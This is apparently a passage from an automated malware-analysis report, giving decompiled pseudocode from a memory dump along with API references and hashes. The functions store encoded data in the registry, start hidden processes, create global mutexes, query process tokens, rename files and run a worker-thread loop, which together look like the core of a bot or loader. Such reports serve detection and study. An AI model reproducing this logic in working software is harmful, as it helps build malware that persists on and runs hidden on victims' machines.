    				_v24 = __ecx;
    				if(_a4 == 0 || _a8 == 0) {
    					L13:
    					_t49 = _t48 | 0xffffffff;
    					__eflags = _t49;
    					return _t49;
    				} else {
    					_t115 = __edx;
    					if(__edx == 0) {
    						goto L13;
    					}
    					_t107 =  *((intOrPtr*)(__ecx + 0x108));
    					_push(_t107);
    					_t103 = 4;
    					_v12 = __edx;
    					_v28 = E0360D40B( &_v12, _t103);
    					_t93 = _t107 + __edx;
    					E0361230C(_t107 + __edx,  &_v2832);
    					_t54 = E03612438(_t93, _t115, __fp0,  &_v2832, 0, 0x64);
    					_t108 = _a8;
    					_v12 = _t54;
    					_v20 = _t54 + 6 + _t108;
    					_t106 = E036085EA(_t54 + 6 + _t108);
    					_v32 = _t106;
    					if(_t106 != 0) {
    						 *_t106 = _a12;
    						_t16 =  &(_t106[6]); // 0x6
    						_t106[1] = 1;
    						_t106[2] = _t108;
    						E036086C7(_t16, _a4, _t108);
    						_t21 = _t108 + 6; // 0x6
    						E036122DE( &_v2832, _t21 + _t106, _v12);
    						_v16 = _t89;
    						_t90 = _v24;
    						_v12 =  *((intOrPtr*)(_t90 + 0x108));
    						_push( &_v52);
    						_t104 = 8;
    						E0360F49B( &_v16, _t104);
    						E0360EACC( &_v16,  &_v52, 0x14,  &_v328);
    						E0360EB39(_t106, _v20,  &_v328);
    						_t73 = E03609AF4(_t90);
    						_v12 = _t73;
    						__eflags = _t73;
    						if(_t73 != 0) {
    							E03609786(_v28,  &_v64, 0x10);
    							_t80 = RegOpenKeyExA( *(_t90 + 0x10c), _v12, 0, 2,  &_a4);
    							__eflags = _t80;
    							if(_t80 == 0) {
    								_t83 = RegSetValueExA(_a4,  &_v64, 0, 3, _t106, _v20);
    								__eflags = _t83;
    								if(_t83 != 0) {
    									_push(0xfffffffc);
    									_pop(0);
    								}
    								RegCloseKey(_a4);
    							} else {
    								_push(0xfffffffd);
    								_pop(0);
    							}
    							E03608600( &_v12, 0xffffffff);
    						}
    						E03608600( &_v32, 0);
    						return 0;
    					}
    					_t88 = 0xfffffffe;
    					return _t88;
    				}
    			}

    APIs
      • Part of subcall function 03612438: _ftol2_sse.MSVCRT ref: 03612499
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000002,00000000), ref: 0360A1C4
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AllocateHeapOpen_ftol2_sse
    • String ID:
    • API String ID: 3756893521-0
    • Opcode ID: 83520714c816e96237f25e5051467681b421479c4845aa891e04be96b12e0dd3
    • Instruction ID: 0f09ec83fc9ac4bf6cebabe47d2e66177d407a7d18a07834d7c266a164a4156f
    • Opcode Fuzzy Hash: 83520714c816e96237f25e5051467681b421479c4845aa891e04be96b12e0dd3
    • Instruction Fuzzy Hash: 72516D76900319ABCF15DF94CC41FDFBBB8AB04350F14416AE514AB2D0EB719655CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E0360A8F7(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
    				struct _PROCESS_INFORMATION _v20;
    				struct _STARTUPINFOW _v92;
    				signed int _t24;
    				intOrPtr _t30;
    				intOrPtr _t32;
    				intOrPtr _t34;
    				int _t42;
    				WCHAR* _t44;
    
    				_t42 = 0x44;
    				memset( &_v92, 0, _t42);
    				_v92.cb = _t42;
    				asm("stosd");
    				_t44 = 1;
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				_t24 = _a16;
    				if(_t24 != 0) {
    					_v92.dwFlags = 1;
    					_v92.wShowWindow = 0;
    				}
    				asm("sbb eax, eax");
    				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
    					_t44 = 0;
    				} else {
    					if(_a8 != 0) {
    						_push(_a12);
    						_t34 =  *0x361e684; // 0x530f6c8
    						_push(_v20.hProcess);
    						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
    							GetExitCodeProcess(_v20.hProcess, _a8);
    						}
    					}
    					_t30 =  *0x361e684; // 0x530f6c8
    					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
    					_t32 =  *0x361e684; // 0x530f6c8
    					 *((intOrPtr*)(_t32 + 0x30))(_v20);
    				}
    				return _t44;
    			}

    APIs
    • memset.MSVCRT ref: 0360A90B
    • CreateProcessW.KERNELBASE(00000000,00001388,00000000,00000000,00000000,0360C1B6,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 0360A952
    • GetExitCodeProcess.KERNEL32 ref: 0360A976
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: Process$CodeCreateExitmemset
    • String ID:
    • API String ID: 4170947310-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E0360B97E(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
    				long _v8;
    				void* _v12;
    				void* _t12;
    				void* _t20;
    				void* _t22;
    				union _TOKEN_INFORMATION_CLASS _t28;
    				void* _t31;
    
    				_push(_t22);
    				_push(_t22);
    				_t31 = 0;
    				_t28 = __edx;
    				_t20 = _t22;
    				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
    					L6:
    					_t12 = _t31;
    				} else {
    					_t31 = E036085EA(_v8);
    					_v12 = _t31;
    					if(_t31 != 0) {
    						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
    							goto L6;
    						} else {
    							E03608600( &_v12, _t16);
    							goto L3;
    						}
    					} else {
    						L3:
    						_t12 = 0;
    					}
    				}
    				return _t12;
    			}











    APIs
    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,0360BA1D,?,00000000,?,0360D0B3), ref: 0360B999
    • GetLastError.KERNEL32(?,0360BA1D,?,00000000,?,0360D0B3), ref: 0360B9A0
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0360BA1D,?,00000000,?,0360D0B3), ref: 0360B9CF
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: InformationToken$AllocateErrorHeapLast
    • String ID:
    • API String ID: 2499131667-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E036058F4(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
    				intOrPtr _t10;
    				void* _t13;
    				void* _t19;
    				signed int _t21;
    				signed int _t22;
    
    				_t13 = __edx;
    				if(__ecx != 0) {
    					_t22 = 0;
    					_t19 = CreateMutexA(0, 1, __ecx);
    					if(_t19 != 0) {
    						if(GetLastError() != 0xb7 || E0360A4A5(_t19, _t13) != 0xffffffff) {
    							_t22 = 1;
    							 *_a4 = _t19;
    						} else {
    							_t10 =  *0x361e684; // 0x530f6c8
    							 *((intOrPtr*)(_t10 + 0x30))(_t19);
    						}
    					} else {
    						GetLastError();
    						_t22 = 0xffffffff;
    					}
    				} else {
    					_t22 = _t21 | 0xffffffff;
    				}
    				return _t22;
    			}









    APIs
    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,036059B5,03605DBC,Global,0361BA10,?,00000000,?,00000002), ref: 03605910
    • GetLastError.KERNEL32(?,?,036059B5,03605DBC,Global,0361BA10,?,00000000,?,00000002), ref: 0360591C
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: CreateErrorLastMutex
    • String ID:
    • API String ID: 1925916568-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0360A457(CHAR* __ecx, void* __edx) {
    				intOrPtr _t8;
    				void* _t16;
    				void* _t17;
    
    				_t16 = __edx; // executed
    				_t17 = CreateMutexA(0, 1, __ecx);
    				if(_t17 != 0) {
    					if(GetLastError() == 0xb7 && E0360A4A5(_t17, _t16) < 0) {
    						_t8 =  *0x361e684; // 0x530f6c8
    						 *((intOrPtr*)(_t8 + 0x30))(_t17);
    						_t17 = 0;
    					}
    					return _t17;
    				}
    				GetLastError();
    				return 0;
    			}







    APIs
    • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,03604E18,00000000), ref: 0360A465
    • GetLastError.KERNEL32 ref: 0360A471
    • GetLastError.KERNEL32 ref: 0360A47B
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: ErrorLast$CreateMutex
    • String ID:
    • API String ID: 200418032-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0360AFF8(void* __ecx, WCHAR* __edx) {
    				int _v8;
    				void _v528;
    				char _v1046;
    				void _v1048;
    				intOrPtr _t21;
    				intOrPtr* _t26;
    				void* _t27;
    				intOrPtr _t33;
    				intOrPtr _t36;
    				void* _t39;
    				intOrPtr _t40;
    				WCHAR* _t47;
    				void* _t49;
    
    				_t39 = __ecx;
    				_v8 = 0x104;
    				_t47 = __edx;
    				memset( &_v1048, 0, 0x208);
    				memset( &_v528, 0, 0x208);
    				_t21 =  *0x361e698; // 0x530f9a0
    				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
    				_t49 = E0360B92C(_t39);
    				_t26 =  *0x361e6b8; // 0x530f9b0
    				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
    				if(_t27 == 0) {
    					_t33 =  *0x361e688; // 0x33f0000
    					if(E0360BB73( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
    						_t36 =  *0x361e698; // 0x530f9a0
    						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
    					}
    				}
    				_t40 =  *0x361e684; // 0x530f6c8
    				 *((intOrPtr*)(_t40 + 0x30))(_t49);
    				lstrcpynW(_t47,  &_v1046 + E0360C39D( &_v528) * 2, 0x104);
    				return 1;
    			}

















    APIs
    • memset.MSVCRT ref: 0360B01D
    • memset.MSVCRT ref: 0360B02B
      • Part of subcall function 0360B92C: GetCurrentThread.KERNEL32 ref: 0360B93F
      • Part of subcall function 0360B92C: GetLastError.KERNEL32(?,?,0360BA62,73BCF500,10000000), ref: 0360B94D
      • Part of subcall function 0360B92C: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,0360BA62,73BCF500,10000000), ref: 0360B966
    • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 0360B0B6
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: Currentmemset$ErrorLastProcessThreadlstrcpyn
    • String ID:
    • API String ID: 4088293216-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E03606D86(void* __eflags, void* __fp0) {
    				short _v536;
    				WCHAR* _v544;
    				WCHAR* _t9;
    				intOrPtr _t10;
    				intOrPtr _t11;
    				void* _t22;
    				void* _t32;
    				intOrPtr _t34;
    				intOrPtr _t35;
    				intOrPtr _t41;
    				intOrPtr _t43;
    				intOrPtr _t46;
    				intOrPtr _t49;
    				void* _t51;
    				void* _t53;
    				void* _t56;
    				WCHAR* _t59;
    				signed int _t60;
    				void* _t62;
    				void* _t63;
    				void* _t74;
    
    				_t74 = __fp0;
    				_t34 =  *0x361e778; // 0x530f9f0
    				_t62 = (_t60 & 0xfffffff8) - 0x21c;
    				_t51 = 0x31;
    				_t32 = 1; // executed
    				_t9 = E03609EB6(_t34, _t51); // executed
    				if(_t9 != 0) {
    					_t10 =  *0x361e78c; // 0x0
    					_t66 = _t10;
    					if(_t10 == 0) {
    						_t49 =  *0x361e688; // 0x33f0000
    						_t10 = E0360EDDA(_t49 + 0xb0, _t51, _t66);
    						 *0x361e78c = _t10;
    					}
    					_push(0);
    					_push(_t10);
    					_t11 =  *0x361e688; // 0x33f0000
    					_push(0x361bd00);
    					_t9 = E036092CB(_t11 + 0x438);
    					_t59 = _t9;
    					_t63 = _t62 + 0x10;
    					_v544 = _t59;
    					if(_t59 != 0) {
    						while(1) {
    							_t35 =  *0x361e688; // 0x33f0000
    							_t56 = E0360A457(_t35 + 0x1878, 0x1388);
    							if(_t56 == 0) {
    								break;
    							}
    							if(E0360B24F(_t59) == 0) {
    								_t32 = E0360F15A(_t59, 0x1388, _t74);
    							}
    							E0360A4C1(_t56);
    							_t41 =  *0x361e684; // 0x530f6c8
    							 *((intOrPtr*)(_t41 + 0x30))(_t56);
    							if(_t32 > 0) {
    								E036097F2( &_v544);
    								_t43 =  *0x361e778; // 0x530f9f0
    								_t53 = 0x33;
    								if(E03609EB6(_t43, _t53) != 0) {
    									L12:
    									__eflags = E03601C68(_t59, __eflags, _t74);
    									if(__eflags >= 0) {
    										E0360B197(_t59, _t53, __eflags, _t74);
    										continue;
    									}
    								} else {
    									_t46 =  *0x361e778; // 0x530f9f0
    									_t53 = 0x12;
    									_t22 = E03609EB6(_t46, _t53);
    									_t72 = _t22;
    									if(_t22 != 0 || E0360A4D5(_t53, _t72) != 0) {
    										_push(E036097F2(0));
    										E03609626( &_v536, 0x104, L"%s.%u", _t59);
    										_t63 = _t63 + 0x14;
    										MoveFileW(_t59,  &_v536);
    										continue;
    									} else {
    										goto L12;
    									}
    								}
    							}
    							break;
    						}
    						_t9 = E03608600( &_v544, 0xfffffffe);
    					}
    				}
    				return _t9;
    			}

























    APIs
    • MoveFileW.KERNEL32(00000000,?), ref: 03606E9B
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: FileMove
    • String ID: %s.%u
    • API String ID: 3562171763-1288070821
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E03602AEA() {
    				intOrPtr _v8;
    				signed int _v12;
    				CHAR* _v16;
    				signed int _t16;
    				intOrPtr _t21;
    				intOrPtr _t22;
    				void* _t26;
    				void* _t29;
    				signed int _t31;
    				intOrPtr _t36;
    				CHAR* _t38;
    				intOrPtr _t39;
    				void* _t40;
    
    				_t15 =  *0x361e710 * 0x64;
    				_t39 = 0;
    				_v12 =  *0x361e710 * 0x64;
    				_t16 = E036085EA(_t15);
    				_t38 = _t16;
    				_v16 = _t38;
    				if(_t38 != 0) {
    					_t31 =  *0x361e710; // 0x2
    					_t36 = 0;
    					_v8 = 0;
    					if(_t31 == 0) {
    						L9:
    						_push(_t38);
    						E03609F2E(0xe); // executed
    						E03608600( &_v16, _t39);
    						return 0;
    					}
    					_t29 = 0;
    					do {
    						_t21 =  *0x361e714; // 0x52e4cc8
    						if( *((intOrPtr*)(_t29 + _t21)) != 0) {
    							if(_t39 != 0) {
    								lstrcatA(_t38, "|");
    								_t39 = _t39 + 1;
    							}
    							_t22 =  *0x361e714; // 0x52e4cc8
    							_push( *((intOrPtr*)(_t29 + _t22 + 0x10)));
    							_push( *((intOrPtr*)(_t29 + _t22 + 8)));
    							_t26 = E036095E7( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
    							_t31 =  *0x361e710; // 0x2
    							_t40 = _t40 + 0x18;
    							_t36 = _v8;
    							_t39 = _t39 + _t26;
    						}
    						_t36 = _t36 + 1;
    						_t29 = _t29 + 0x20;
    						_v8 = _t36;
    					} while (_t36 < _t31);
    					goto L9;
    				}
    				return _t16 | 0xffffffff;
    			}

















    APIs
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    • lstrcatA.KERNEL32(00000000,0361B998,03605726,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,03605726), ref: 03602B3D
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AllocateHeaplstrcat
    • String ID: %u;%u;%u
    • API String ID: 3011335133-2973439046
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0360595C(void* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				char _v12;
    				char _v52;
    				intOrPtr _t16;
    				void* _t19;
    				intOrPtr _t27;
    				void* _t42;
    
    				_t42 = __edx;
    				_v8 = 0;
    				E0360A853( &_v52, __ecx, __eflags);
    				_t16 =  *0x361e688; // 0x33f0000
    				if( *((intOrPtr*)(_t16 + 0x644)) > 0) {
    					L1:
    					_t27 =  *0x361e684; // 0x530f6c8
    					 *((intOrPtr*)(_t27 + 0xb4))(0x32);
    					goto L1;
    				}
    				_push(0);
    				_push( &_v52);
    				_push("\\");
    				_v12 = E03609278("Global");
    				_t19 = E036058F4(_t18, _t42,  &_v8); // executed
    				__eflags = _t19 - 1;
    				if(_t19 == 1) {
    					FindCloseChangeNotification(_v8);
    					_v8 = 0;
    					E036058F4( &_v52, _t42,  &_v8); // executed
    				}
    				E03608600( &_v12, 0xffffffff);
    				return _v8;
    			}











    APIs
    • FindCloseChangeNotification.KERNELBASE(03605DBC,?,?,?,?,00000002), ref: 036059C5
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: ChangeCloseFindNotification
    • String ID: Global
    • API String ID: 2591292051-4020866741
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E036098D4(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				intOrPtr _t45;
    				intOrPtr _t46;
    				intOrPtr _t48;
    				intOrPtr _t49;
    				void* _t52;
    				intOrPtr _t53;
    				intOrPtr _t54;
    				struct _SECURITY_ATTRIBUTES* _t58;
    				intOrPtr _t59;
    				intOrPtr _t61;
    				intOrPtr _t65;
    				intOrPtr _t66;
    				intOrPtr _t67;
    				intOrPtr _t69;
    				struct _SECURITY_ATTRIBUTES* _t73;
    				intOrPtr _t74;
    				intOrPtr _t77;
    				intOrPtr _t78;
    				intOrPtr _t79;
    				intOrPtr _t82;
    				intOrPtr _t83;
    				void* _t86;
    				intOrPtr _t87;
    				intOrPtr _t89;
    				signed int _t92;
    				intOrPtr _t97;
    				intOrPtr _t98;
    				int _t106;
    				intOrPtr _t110;
    				signed int _t112;
    				signed int _t113;
    				void* _t115;
    
    				_push(__ecx);
    				_push(__ecx);
    				_v8 = __edx;
    				_v12 = __ecx;
    				_t77 =  *0x361e76c; // 0x3a8
    				_t73 = 0;
    				if(E0360A4A5(_t77, 0x7530) >= 0) {
    					_t45 =  *0x361e770; // 0x52e6340
    					_t112 = 0;
    					_t106 = 0;
    					do {
    						_t78 =  *((intOrPtr*)(_t106 + _t45));
    						if(_t78 == 0) {
    							L6:
    							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
    								_t113 = _t112 << 5;
    								if(_v8 == _t73) {
    									 *(_t113 + _t45 + 0x10) = _t73;
    									_t46 =  *0x361e770; // 0x52e6340
    									 *(_t113 + _t46 + 0xc) = _t73;
    									L14:
    									_t79 =  *0x361e770; // 0x52e6340
    									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
    									_t48 =  *0x361e770; // 0x52e6340
    									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
    									_t49 = E0360A457(0, 1);
    									_t82 =  *0x361e770; // 0x52e6340
    									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
    									_t83 =  *0x361e770; // 0x52e6340
    									_t30 = _t83 + _t113 + 4; // 0x52e6344
    									_t52 = CreateThread(_t73, _t73, E0360988C, _t83 + _t113, _t73, _t30);
    									_t53 =  *0x361e770; // 0x52e6340
    									 *(_t113 + _t53) = _t52;
    									_t54 =  *0x361e770; // 0x52e6340
    									_t86 =  *(_t113 + _t54);
    									if(_t86 != 0) {
    										SetThreadPriority(_t86, 0xffffffff);
    										_t87 =  *0x361e770; // 0x52e6340
    										 *0x361e774 =  *0x361e774 + 1;
    										E0360A4C1( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
    										_t74 =  *0x361e770; // 0x52e6340
    										_t73 = _t74 + _t113;
    									} else {
    										_t59 =  *0x361e684; // 0x530f6c8
    										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
    										_t61 =  *0x361e770; // 0x52e6340
    										_t37 = _t61 + 0xc; // 0x52e634c
    										_t91 = _t37 + _t113;
    										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
    											E03608600(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
    											_t61 =  *0x361e770; // 0x52e6340
    										}
    										_t92 = 8;
    										memset(_t113 + _t61, 0, _t92 << 2);
    									}
    									L19:
    									_t89 =  *0x361e76c; // 0x3a8
    									E0360A4C1(_t89);
    									_t58 = _t73;
    									L20:
    									return _t58;
    								}
    								_t110 = _a4;
    								_t65 = E036085EA(_t110);
    								_t97 =  *0x361e770; // 0x52e6340
    								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
    								_t66 =  *0x361e770; // 0x52e6340
    								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
    									goto L19;
    								}
    								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
    								_t67 =  *0x361e770; // 0x52e6340
    								E036086C7( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
    								_t115 = _t115 + 0xc;
    								goto L14;
    							}
    							goto L7;
    						}
    						_t69 =  *0x361e684; // 0x530f6c8
    						_push(_t73);
    						_push(_t78);
    						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
    							_t45 =  *0x361e770; // 0x52e6340
    							goto L7;
    						}
    						_t98 =  *0x361e770; // 0x52e6340
    						E03609830(_t106 + _t98, 0);
    						_t45 =  *0x361e770; // 0x52e6340
    						goto L6;
    						L7:
    						_t106 = _t106 + 0x20;
    						_t112 = _t112 + 1;
    					} while (_t106 < 0x1000);
    					goto L19;
    				}
    				_t58 = 0;
    				goto L20;
    			}






































    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E03605619(void* __edx, void* __edi) {
    				char _v44;
    				void* _t8;
    				intOrPtr _t11;
    				intOrPtr _t14;
    				intOrPtr _t17;
    				intOrPtr _t18;
    				void* _t20;
    				void* _t33;
    				void* _t34;
    				void* _t36;
    				void* _t39;
    				void* _t40;
    				intOrPtr _t49;
    				void* _t54;
    
    				_t54 = __edi;
    				_t8 = E03609E4C(0x3b); // executed
    				if(_t8 != 0xffffffff) {
    					L2:
    					E036097F2(0x361e6c8);
    					_t39 = 0x37; // executed
    					E03609EEC(_t39);
    					_t11 =  *0x361e688; // 0x33f0000
    					_t40 = 0x3a; // executed
    					E03609EEC(_t40); // executed
    					E0360E4CC(_t63);
    					_t14 =  *0x361e688; // 0x33f0000
    					_t41 =  &_v44;
    					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
    					E0360A853( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
    					_t17 =  *0x361e684; // 0x530f6c8
    					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0x361e6c8,  *0x361e6cc);
    					 *0x361e74c = _t18;
    					if(_t18 != 0) {
    						_t20 = CreateMutexA(0, 0, 0);
    						 *0x361e76c = _t20;
    						__eflags = _t20;
    						if(_t20 != 0) {
    							_t34 = E036085EA(0x1000);
    							_t52 = 0;
    							 *0x361e770 = _t34;
    							_t49 =  *0x361e774; // 0x2
    							__eflags = _t34;
    							_t41 =  !=  ? 0 : _t49;
    							 *0x361e774 =  !=  ? 0 : _t49; // executed
    						}
    						E0360153B(_t41, _t52); // executed
    						E036098D4(E03602EDA, 0, __eflags, 0, 0); // executed
    						E03603017(); // executed
    						E036031C2(__eflags); // executed
    						E036029B1(); // executed
    						E03603BB3(_t54, __eflags); // executed
    						while(1) {
    							__eflags =  *0x361e758; // 0x0
    							if(__eflags != 0) {
    								break;
    							}
    							E036097F2(0x361e750);
    							_push(0x361e750);
    							_push(0x361e750); // executed
    							E0360279B();
    							Sleep(0xfa0);
    						}
    						E03603D35();
    						E03609A74();
    						E036034C0();
    						_t33 = 0;
    						__eflags = 0;
    					} else {
    						goto L3;
    					}
    				} else {
    					_t36 = E03602DCB();
    					_t63 = _t36;
    					if(_t36 != 0) {
    						L3:
    						_t33 = 1;
    					} else {
    						goto L2;
    					}
    				}
    				return _t33;
    			}


















    APIs
    • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 036056B8
      • Part of subcall function 036097F2: GetSystemTimeAsFileTime.KERNEL32(?,?,03605F8C), ref: 036097FF
    • Sleep.KERNELBASE(00000FA0), ref: 03605732
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: Time$CreateFileMutexSleepSystem
    • String ID:
    • API String ID: 1795067453-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 26%
    			E0360A68F(void* __ecx, signed int _a4, intOrPtr* _a8) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _t26;
    				intOrPtr _t27;
    				intOrPtr _t29;
    				intOrPtr* _t39;
    				void* _t47;
    				intOrPtr _t55;
    				intOrPtr _t58;
    				char _t60;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t50 = _a4;
    				_t60 = 0;
    				_v12 = 0;
    				if(_a4 != 0) {
    					_t47 = E0360A621(_t50);
    					if(_t47 == 0) {
    						L11:
    						_t26 = 0;
    						L12:
    						L13:
    						return _t26;
    					}
    					_t27 =  *0x361e684; // 0x530f6c8
    					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
    					if(_t58 == 0) {
    						L9:
    						_t29 =  *0x361e684; // 0x530f6c8
    						 *((intOrPtr*)(_t29 + 0x30))(_t47);
    						if(_t60 != 0) {
    							E03608600( &_v12, 0);
    						}
    						goto L11;
    					}
    					_t4 = _t58 + 1; // 0x1
    					_t60 = E036085EA(_t4);
    					_v12 = _t60;
    					if(_t60 == 0) {
    						goto L9;
    					}
    					_a4 = _a4 & 0;
    					_push(0);
    					_v8 = 0;
    					_push( &_a4);
    					_push(_t58);
    					_push(_t60);
    					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
    						if(_a4 == 0) {
    							if(_v8 != _t58) {
    								goto L9;
    							}
    							_t39 = _a8;
    							 *((char*)(_t58 + _t60)) = 0;
    							if(_t39 != 0) {
    								 *_t39 = _t58;
    							}
    							FindCloseChangeNotification(_t47);
    							_t26 = _t60;
    							goto L12;
    						}
    						_t55 = _v8 + _a4;
    						_a4 = _a4 & 0x00000000;
    						_push(0);
    						_push( &_a4);
    						_v8 = _t55;
    						_push(_t58 - _t55);
    						_push(_t55 + _t60);
    					}
    					goto L9;
    				}
    				_t26 = 0;
    				goto L13;
    			}














    APIs
    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,0360FA61,00000000,0360F8C0,033EEFE0,0361B988,00000000,0361B988,00000000,00000000,00000615), ref: 0360A719
    • FindCloseChangeNotification.KERNELBASE(00000000,?,0360FA61,00000000,0360F8C0,033EEFE0,0361B988,00000000,0361B988,00000000,00000000,00000615,0000034A,00000000,0530FB08,00000400), ref: 0360A75C
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: ChangeCloseFileFindNotificationRead
    • String ID:
    • API String ID: 1200561807-0
    • Opcode ID: 0fd255b8d208680ddbe158aa09fcf673704dd4bd294da0d6ddfe2530a741cb2f
    • Instruction ID: 65c092b55a3842492e088717fd1c55ac2a73721fb433b2e7eee729f8d99f79e2
    • Opcode Fuzzy Hash: 0fd255b8d208680ddbe158aa09fcf673704dd4bd294da0d6ddfe2530a741cb2f
    • Instruction Fuzzy Hash: B521857A610305AFDB19CFA4C989FABB7BCEF44680F15806AF905DB281E770D9408794
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E0360153B(void* __ecx, void* __edx) {
    				void* _v8;
    				void* _t3;
    				signed int _t4;
    				intOrPtr _t7;
    				signed int _t9;
    				intOrPtr _t10;
    				void* _t24;
    
    				_push(__ecx);
    				_t3 = CreateMutexA(0, 0, 0); // executed
    				 *0x361e6f4 = _t3;
    				if(_t3 == 0) {
    					L11:
    					_t4 = _t3 | 0xffffffff;
    					__eflags = _t4;
    				} else {
    					_t3 = CreateMutexA(0, 0, 0);
    					 *0x361e6dc = _t3;
    					if(_t3 == 0) {
    						goto L11;
    					} else {
    						_t3 = E03601080(0x4ac);
    						_v8 = _t3;
    						if(_t3 == 0) {
    							goto L11;
    						} else {
    							 *0x361e6e8 = E0360918C(_t3, 0);
